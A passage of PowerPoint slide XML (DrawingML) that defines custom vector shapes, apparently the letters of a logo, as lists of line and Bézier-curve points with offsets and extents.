                    <a:gd name="T21" fmla="*/ 45 h 45"/>
                    <a:gd name="T22" fmla="*/ 0 w 24"/>
                    <a:gd name="T23" fmla="*/ 45 h 45"/>
                    <a:gd name="T24" fmla="*/ 0 w 24"/>
                    <a:gd name="T25"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45">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="24" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="19"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="23"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="24" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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312"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10402888" y="4841876"/>
                  <a:ext cx="55563" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 35"/>
                    <a:gd name="T1" fmla="*/ 45 h 45"/>
                    <a:gd name="T2" fmla="*/ 0 w 35"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 1 w 35"/>
                    <a:gd name="T5" fmla="*/ 0 h 45"/>
                    <a:gd name="T6" fmla="*/ 30 w 35"/>
                    <a:gd name="T7" fmla="*/ 35 h 45"/>
                    <a:gd name="T8" fmla="*/ 30 w 35"/>
                    <a:gd name="T9" fmla="*/ 0 h 45"/>
                    <a:gd name="T10" fmla="*/ 35 w 35"/>
                    <a:gd name="T11" fmla="*/ 0 h 45"/>
                    <a:gd name="T12" fmla="*/ 35 w 35"/>
                    <a:gd name="T13" fmla="*/ 45 h 45"/>
                    <a:gd name="T14" fmla="*/ 35 w 35"/>
                    <a:gd name="T15" fmla="*/ 45 h 45"/>
                    <a:gd name="T16" fmla="*/ 6 w 35"/>
                    <a:gd name="T17" fmla="*/ 10 h 45"/>
                    <a:gd name="T18" fmla="*/ 6 w 35"/>
                    <a:gd name="T19" fmla="*/ 45 h 45"/>
                    <a:gd name="T20" fmla="*/ 0 w 35"/>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5">
                      <a:moveTo>
                        <a:pt x="0" y="45"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="35"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="30" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="10"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="6" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="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313"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10469563" y="4841876"/>
                  <a:ext cx="39688" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 25"/>
                    <a:gd name="T1" fmla="*/ 4 h 45"/>
                    <a:gd name="T2" fmla="*/ 0 w 25"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 25 w 25"/>
                    <a:gd name="T5" fmla="*/ 0 h 45"/>
                    <a:gd name="T6" fmla="*/ 25 w 25"/>
                    <a:gd name="T7" fmla="*/ 4 h 45"/>
                    <a:gd name="T8" fmla="*/ 14 w 25"/>
                    <a:gd name="T9" fmla="*/ 4 h 45"/>
                    <a:gd name="T10" fmla="*/ 14 w 25"/>
                    <a:gd name="T11" fmla="*/ 45 h 45"/>
                    <a:gd name="T12" fmla="*/ 10 w 25"/>
                    <a:gd name="T13" fmla="*/ 45 h 45"/>
                    <a:gd name="T14" fmla="*/ 10 w 25"/>
                    <a:gd name="T15" fmla="*/ 4 h 45"/>
                    <a:gd name="T16" fmla="*/ 0 w 25"/>
                    <a:gd name="T17" fmla="*/ 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45">
                      <a:moveTo>
                        <a:pt x="0" y="4"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="0" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="25" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="4"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="14" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="10" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="1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314"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10510838" y="4840288"/>
                  <a:ext cx="41275" cy="73025"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 18"/>
                    <a:gd name="T1" fmla="*/ 26 h 32"/>
                    <a:gd name="T2" fmla="*/ 2 w 18"/>
                    <a:gd name="T3" fmla="*/ 24 h 32"/>
                    <a:gd name="T4" fmla="*/ 9 w 18"/>
                    <a:gd name="T5" fmla="*/ 29 h 32"/>
                    <a:gd name="T6" fmla="*/ 12 w 18"/>
                    <a:gd name="T7" fmla="*/ 29 h 32"/>
                    <a:gd name="T8" fmla="*/ 14 w 18"/>
                    <a:gd name="T9" fmla="*/ 27 h 32"/>
                    <a:gd name="T10" fmla="*/ 14 w 18"/>
                    <a:gd name="T11" fmla="*/ 24 h 32"/>
                    <a:gd name="T12" fmla="*/ 13 w 18"/>
                    <a:gd name="T13" fmla="*/ 21 h 32"/>
                    <a:gd name="T14" fmla="*/ 8 w 18"/>
                    <a:gd name="T15" fmla="*/ 16 h 32"/>
                    <a:gd name="T16" fmla="*/ 3 w 18"/>
                    <a:gd name="T17" fmla="*/ 12 h 32"/>
                    <a:gd name="T18" fmla="*/ 2 w 18"/>
                    <a:gd name="T19" fmla="*/ 7 h 32"/>
                    <a:gd name="T20" fmla="*/ 3 w 18"/>
                    <a:gd name="T21" fmla="*/ 4 h 32"/>
                    <a:gd name="T22" fmla="*/ 5 w 18"/>
                    <a:gd name="T23" fmla="*/ 1 h 32"/>
                    <a:gd name="T24" fmla="*/ 9 w 18"/>
                    <a:gd name="T25" fmla="*/ 0 h 32"/>
                    <a:gd name="T26" fmla="*/ 13 w 18"/>
                    <a:gd name="T27" fmla="*/ 1 h 32"/>
                    <a:gd name="T28" fmla="*/ 17 w 18"/>
                    <a:gd name="T29" fmla="*/ 5 h 32"/>
                    <a:gd name="T30" fmla="*/ 15 w 18"/>
                    <a:gd name="T31" fmla="*/ 7 h 32"/>
                    <a:gd name="T32" fmla="*/ 12 w 18"/>
                    <a:gd name="T33" fmla="*/ 4 h 32"/>
                    <a:gd name="T34" fmla="*/ 9 w 18"/>
                    <a:gd name="T35" fmla="*/ 3 h 32"/>
                    <a:gd name="T36" fmla="*/ 6 w 18"/>
                    <a:gd name="T37" fmla="*/ 5 h 32"/>
                    <a:gd name="T38" fmla="*/ 5 w 18"/>
                    <a:gd name="T39" fmla="*/ 7 h 32"/>
                    <a:gd name="T40" fmla="*/ 5 w 18"/>
                    <a:gd name="T41" fmla="*/ 9 h 32"/>
                    <a:gd name="T42" fmla="*/ 7 w 18"/>
                    <a:gd name="T43" fmla="*/ 11 h 32"/>
                    <a:gd name="T44" fmla="*/ 11 w 18"/>
                    <a:gd name="T45" fmla="*/ 14 h 32"/>
                    <a:gd name="T46" fmla="*/ 16 w 18"/>
                    <a:gd name="T47" fmla="*/ 20 h 32"/>
                    <a:gd name="T48" fmla="*/ 18 w 18"/>
                    <a:gd name="T49" fmla="*/ 24 h 32"/>
                    <a:gd name="T50" fmla="*/ 15 w 18"/>
                    <a:gd name="T51" fmla="*/ 30 h 32"/>
                    <a:gd name="T52" fmla="*/ 9 w 18"/>
                    <a:gd name="T53" fmla="*/ 32 h 32"/>
                    <a:gd name="T54" fmla="*/ 4 w 18"/>
                    <a:gd name="T55" fmla="*/ 31 h 32"/>
                    <a:gd name="T56" fmla="*/ 0 w 18"/>
                    <a:gd name="T57"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32">
                      <a:moveTo>
                        <a:pt x="0" y="26"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="24"/>
                        <a:pt x="2" y="24"/>
                        <a:pt x="2" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="28"/>
                        <a:pt x="6" y="29"/>
                        <a:pt x="9" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="29"/>
                        <a:pt x="11" y="29"/>
                        <a:pt x="12" y="29"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="13" y="28"/>
                        <a:pt x="13" y="28"/>
                        <a:pt x="14" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="26"/>
                        <a:pt x="14" y="25"/>
                        <a:pt x="14" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="23"/>
                        <a:pt x="14" y="22"/>
                        <a:pt x="13" y="21"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="20"/>
                        <a:pt x="11" y="18"/>
                        <a:pt x="8" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="14"/>
                        <a:pt x="4" y="13"/>
                        <a:pt x="3" y="12"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="11"/>
                        <a:pt x="2" y="9"/>
                        <a:pt x="2" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="6"/>
                        <a:pt x="2" y="5"/>
                        <a:pt x="3" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="3"/>
                        <a:pt x="4" y="2"/>
                        <a:pt x="5" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="1"/>
                        <a:pt x="8" y="0"/>
                        <a:pt x="9" y="0"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="0"/>
                        <a:pt x="12" y="1"/>
                        <a:pt x="13" y="1"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="2"/>
                        <a:pt x="16" y="3"/>
                        <a:pt x="17" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                        <a:pt x="15" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="6"/>
                        <a:pt x="13" y="5"/>
                        <a:pt x="12" y="4"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="4"/>
                        <a:pt x="10" y="3"/>
                        <a:pt x="9" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="3"/>
                        <a:pt x="7" y="4"/>
                        <a:pt x="6" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="5"/>
                        <a:pt x="5" y="6"/>
                        <a:pt x="5" y="7"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="5" y="8"/>
                        <a:pt x="5" y="9"/>
                        <a:pt x="5" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="10"/>
                        <a:pt x="6" y="11"/>
                        <a:pt x="7" y="11"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="12"/>
                        <a:pt x="9" y="13"/>
                        <a:pt x="11" y="14"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="16"/>
                        <a:pt x="15" y="18"/>
                        <a:pt x="16" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="17" y="21"/>
                        <a:pt x="18" y="23"/>
                        <a:pt x="18" y="24"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="18" y="26"/>
                        <a:pt x="17" y="28"/>
                        <a:pt x="15" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="32"/>
                        <a:pt x="12" y="32"/>
                        <a:pt x="9" y="32"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="32"/>
                        <a:pt x="6" y="32"/>
                        <a:pt x="4" y="31"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="30"/>
                        <a:pt x="1" y="28"/>
                        <a:pt x="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Rectangle 315"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10621963" y="4876801"/>
                  <a:ext cx="2000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Rectangle 316"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10621963" y="4851401"/>
                  <a:ext cx="20002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Rectangle 317"/>
                <p:cNvSpPr>
                  <a:spLocks noChangeArrowheads="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9894888" y="4933951"/>
                  <a:ext cx="6953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318"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10566400" y="4876801"/>
                  <a:ext cx="55563" cy="66675"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 15 w 35"/>
                    <a:gd name="T1" fmla="*/ 42 h 42"/>
                    <a:gd name="T2" fmla="*/ 35 w 35"/>
                    <a:gd name="T3" fmla="*/ 20 h 42"/>
                    <a:gd name="T4" fmla="*/ 35 w 35"/>
                    <a:gd name="T5" fmla="*/ 0 h 42"/>
                    <a:gd name="T6" fmla="*/ 0 w 35"/>
                    <a:gd name="T7" fmla="*/ 36 h 42"/>
                    <a:gd name="T8" fmla="*/ 15 w 35"/>
                    <a:gd name="T9" fmla="*/ 42 h 42"/>
                  </a:gdLst>
                  <a:ahLst/>
                  <a:cxnLst>
                    <a:cxn ang="0">
                      <a:pos x="T0" y="T1"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T2" y="T3"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T4" y="T5"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T6" y="T7"/>
                    </a:cxn>
                    <a:cxn ang="0">
                      <a:pos x="T8" y="T9"/>
                    </a:cxn>
                  </a:cxnLst>
                  <a:rect l="0" t="0" r="r" b="b"/>
                  <a:pathLst>
                    <a:path w="35" h="42">
                      <a:moveTo>
                        <a:pt x="15" y="42"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="35" y="20"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="35" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="36"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="15"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319"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9956800" y="4694238"/>
                  <a:ext cx="34925" cy="71438"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 0 w 22"/>
                    <a:gd name="T1" fmla="*/ 0 h 45"/>
                    <a:gd name="T2" fmla="*/ 4 w 22"/>
                    <a:gd name="T3" fmla="*/ 0 h 45"/>
                    <a:gd name="T4" fmla="*/ 4 w 22"/>
                    <a:gd name="T5" fmla="*/ 41 h 45"/>
                    <a:gd name="T6" fmla="*/ 22 w 22"/>
                    <a:gd name="T7" fmla="*/ 41 h 45"/>
                    <a:gd name="T8" fmla="*/ 22 w 22"/>
                    <a:gd name="T9" fmla="*/ 45 h 45"/>
                    <a:gd name="T10" fmla="*/ 0 w 22"/>
                    <a:gd name="T11" fmla="*/ 45 h 45"/>
                    <a:gd name="T12" fmla="*/ 0 w 22"/>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22" h="45">
                      <a:moveTo>
                        <a:pt x="0" y="0"/>
                      </a:moveTo>
                      <a:lnTo>
                        <a:pt x="4" y="0"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="4" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="41"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="22" y="45"/>
                      </a:lnTo>
                      <a:lnTo>
                        <a:pt x="0" y="4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320"/>
                <p:cNvSpPr>
                  <a:spLocks noEditPoints="1"/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="9998075" y="4691063"/>
                  <a:ext cx="76200" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 16 w 33"/>
                    <a:gd name="T1" fmla="*/ 0 h 33"/>
                    <a:gd name="T2" fmla="*/ 28 w 33"/>
                    <a:gd name="T3" fmla="*/ 5 h 33"/>
                    <a:gd name="T4" fmla="*/ 33 w 33"/>
                    <a:gd name="T5" fmla="*/ 16 h 33"/>
                    <a:gd name="T6" fmla="*/ 28 w 33"/>
                    <a:gd name="T7" fmla="*/ 28 h 33"/>
                    <a:gd name="T8" fmla="*/ 17 w 33"/>
                    <a:gd name="T9" fmla="*/ 33 h 33"/>
                    <a:gd name="T10" fmla="*/ 5 w 33"/>
                    <a:gd name="T11" fmla="*/ 28 h 33"/>
                    <a:gd name="T12" fmla="*/ 0 w 33"/>
                    <a:gd name="T13" fmla="*/ 17 h 33"/>
                    <a:gd name="T14" fmla="*/ 3 w 33"/>
                    <a:gd name="T15" fmla="*/ 8 h 33"/>
                    <a:gd name="T16" fmla="*/ 8 w 33"/>
                    <a:gd name="T17" fmla="*/ 3 h 33"/>
                    <a:gd name="T18" fmla="*/ 16 w 33"/>
                    <a:gd name="T19" fmla="*/ 0 h 33"/>
                    <a:gd name="T20" fmla="*/ 17 w 33"/>
                    <a:gd name="T21" fmla="*/ 3 h 33"/>
                    <a:gd name="T22" fmla="*/ 10 w 33"/>
                    <a:gd name="T23" fmla="*/ 5 h 33"/>
                    <a:gd name="T24" fmla="*/ 5 w 33"/>
                    <a:gd name="T25" fmla="*/ 10 h 33"/>
                    <a:gd name="T26" fmla="*/ 4 w 33"/>
                    <a:gd name="T27" fmla="*/ 17 h 33"/>
                    <a:gd name="T28" fmla="*/ 7 w 33"/>
                    <a:gd name="T29" fmla="*/ 26 h 33"/>
                    <a:gd name="T30" fmla="*/ 17 w 33"/>
                    <a:gd name="T31" fmla="*/ 30 h 33"/>
                    <a:gd name="T32" fmla="*/ 23 w 33"/>
                    <a:gd name="T33" fmla="*/ 28 h 33"/>
                    <a:gd name="T34" fmla="*/ 28 w 33"/>
                    <a:gd name="T35" fmla="*/ 23 h 33"/>
                    <a:gd name="T36" fmla="*/ 30 w 33"/>
                    <a:gd name="T37" fmla="*/ 16 h 33"/>
                    <a:gd name="T38" fmla="*/ 28 w 33"/>
                    <a:gd name="T39" fmla="*/ 10 h 33"/>
                    <a:gd name="T40" fmla="*/ 23 w 33"/>
                    <a:gd name="T41" fmla="*/ 5 h 33"/>
                    <a:gd name="T42" fmla="*/ 17 w 33"/>
                    <a:gd name="T43"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 h="33">
                      <a:moveTo>
                        <a:pt x="16" y="0"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="0"/>
                        <a:pt x="25" y="2"/>
                        <a:pt x="28" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="31" y="8"/>
                        <a:pt x="33" y="12"/>
                        <a:pt x="33" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="33" y="21"/>
                        <a:pt x="31" y="25"/>
                        <a:pt x="28" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="31"/>
                        <a:pt x="21" y="33"/>
                        <a:pt x="17" y="33"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="33"/>
                        <a:pt x="8" y="31"/>
                        <a:pt x="5" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="2" y="25"/>
                        <a:pt x="0" y="21"/>
                        <a:pt x="0" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="0" y="14"/>
                        <a:pt x="1" y="11"/>
                        <a:pt x="3" y="8"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="6"/>
                        <a:pt x="6" y="4"/>
                        <a:pt x="8" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="11" y="1"/>
                        <a:pt x="14" y="0"/>
                        <a:pt x="16" y="0"/>
                      </a:cubicBezTo>
                      <a:close/>
                      <a:moveTo>
                        <a:pt x="17" y="3"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="3"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="8" y="6"/>
                        <a:pt x="7" y="8"/>
                        <a:pt x="5" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="12"/>
                        <a:pt x="4" y="14"/>
                        <a:pt x="4" y="17"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="4" y="20"/>
                        <a:pt x="5" y="23"/>
                        <a:pt x="7" y="26"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="10" y="28"/>
                        <a:pt x="13" y="30"/>
                        <a:pt x="17" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="30"/>
                        <a:pt x="21" y="29"/>
                        <a:pt x="23" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="25" y="27"/>
                        <a:pt x="27" y="25"/>
                        <a:pt x="28" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="29" y="21"/>
                        <a:pt x="30" y="19"/>
                        <a:pt x="30" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="30" y="14"/>
                        <a:pt x="29" y="12"/>
                        <a:pt x="28" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="8"/>
                        <a:pt x="25" y="6"/>
                        <a:pt x="23" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="21" y="4"/>
                        <a:pt x="19" y="3"/>
                        <a:pt x="1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321"/>
                <p:cNvSpPr>
                  <a:spLocks/>
                </p:cNvSpPr>
                <p:nvPr userDrawn="1"/>
              </p:nvSpPr>
              <p:spPr bwMode="auto">
                <a:xfrm>
                  <a:off x="10086975" y="4691063"/>
                  <a:ext cx="73025" cy="76200"/>
                </a:xfrm>
                <a:custGeom>
                  <a:avLst/>
                  <a:gdLst>
                    <a:gd name="T0" fmla="*/ 30 w 32"/>
                    <a:gd name="T1" fmla="*/ 6 h 33"/>
                    <a:gd name="T2" fmla="*/ 28 w 32"/>
                    <a:gd name="T3" fmla="*/ 9 h 33"/>
                    <a:gd name="T4" fmla="*/ 22 w 32"/>
                    <a:gd name="T5" fmla="*/ 5 h 33"/>
                    <a:gd name="T6" fmla="*/ 16 w 32"/>
                    <a:gd name="T7" fmla="*/ 3 h 33"/>
                    <a:gd name="T8" fmla="*/ 10 w 32"/>
                    <a:gd name="T9" fmla="*/ 5 h 33"/>
                    <a:gd name="T10" fmla="*/ 5 w 32"/>
                    <a:gd name="T11" fmla="*/ 10 h 33"/>
                    <a:gd name="T12" fmla="*/ 3 w 32"/>
                    <a:gd name="T13" fmla="*/ 16 h 33"/>
                    <a:gd name="T14" fmla="*/ 5 w 32"/>
                    <a:gd name="T15" fmla="*/ 23 h 33"/>
                    <a:gd name="T16" fmla="*/ 10 w 32"/>
                    <a:gd name="T17" fmla="*/ 28 h 33"/>
                    <a:gd name="T18" fmla="*/ 17 w 32"/>
                    <a:gd name="T19" fmla="*/ 30 h 33"/>
                    <a:gd name="T20" fmla="*/ 25 w 32"/>
                    <a:gd name="T21" fmla="*/ 27 h 33"/>
                    <a:gd name="T22" fmla="*/ 29 w 32"/>
                    <a:gd name="T23" fmla="*/ 20 h 33"/>
                    <a:gd name="T24" fmla="*/ 19 w 32"/>
                    <a:gd name="T25" fmla="*/ 20 h 33"/>
                    <a:gd name="T26" fmla="*/ 19 w 32"/>
                    <a:gd name="T27" fmla="*/ 17 h 33"/>
                    <a:gd name="T28" fmla="*/ 32 w 32"/>
                    <a:gd name="T29" fmla="*/ 17 h 33"/>
                    <a:gd name="T30" fmla="*/ 28 w 32"/>
                    <a:gd name="T31" fmla="*/ 28 h 33"/>
                    <a:gd name="T32" fmla="*/ 17 w 32"/>
                    <a:gd name="T33" fmla="*/ 33 h 33"/>
                    <a:gd name="T34" fmla="*/ 3 w 32"/>
                    <a:gd name="T35" fmla="*/ 27 h 33"/>
                    <a:gd name="T36" fmla="*/ 0 w 32"/>
                    <a:gd name="T37" fmla="*/ 16 h 33"/>
                    <a:gd name="T38" fmla="*/ 2 w 32"/>
                    <a:gd name="T39" fmla="*/ 8 h 33"/>
                    <a:gd name="T40" fmla="*/ 8 w 32"/>
                    <a:gd name="T41" fmla="*/ 2 h 33"/>
                    <a:gd name="T42" fmla="*/ 16 w 32"/>
                    <a:gd name="T43" fmla="*/ 0 h 33"/>
                    <a:gd name="T44" fmla="*/ 24 w 32"/>
                    <a:gd name="T45" fmla="*/ 2 h 33"/>
                    <a:gd name="T46" fmla="*/ 30 w 32"/>
                    <a:gd name="T47"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3">
                      <a:moveTo>
                        <a:pt x="30" y="6"/>
                      </a:moveTo>
                      <a:cubicBezTo>
                        <a:pt x="28" y="9"/>
                        <a:pt x="28" y="9"/>
                        <a:pt x="28" y="9"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="26" y="7"/>
                        <a:pt x="24" y="6"/>
                        <a:pt x="22" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="4"/>
                        <a:pt x="18" y="3"/>
                        <a:pt x="16" y="3"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="14" y="3"/>
                        <a:pt x="12" y="4"/>
                        <a:pt x="10" y="5"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="7" y="6"/>
                        <a:pt x="6" y="8"/>
                        <a:pt x="5" y="10"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="12"/>
                        <a:pt x="3" y="14"/>
                        <a:pt x="3" y="16"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="3" y="19"/>
                        <a:pt x="3" y="21"/>
                        <a:pt x="5" y="23"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="6" y="25"/>
                        <a:pt x="8" y="27"/>
                        <a:pt x="10" y="28"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="12" y="29"/>
                        <a:pt x="14" y="30"/>
                        <a:pt x="17" y="30"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="20" y="30"/>
                        <a:pt x="23" y="29"/>
                        <a:pt x="25" y="27"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="27" y="25"/>
                        <a:pt x="28" y="23"/>
                        <a:pt x="29" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
                        <a:pt x="19" y="20"/>
                        <a:pt x="19" y="20"/>
                        <a:pt x="19" y="20"/>
                      </a:cubicBezTo>
                      <a:cubicBezTo>
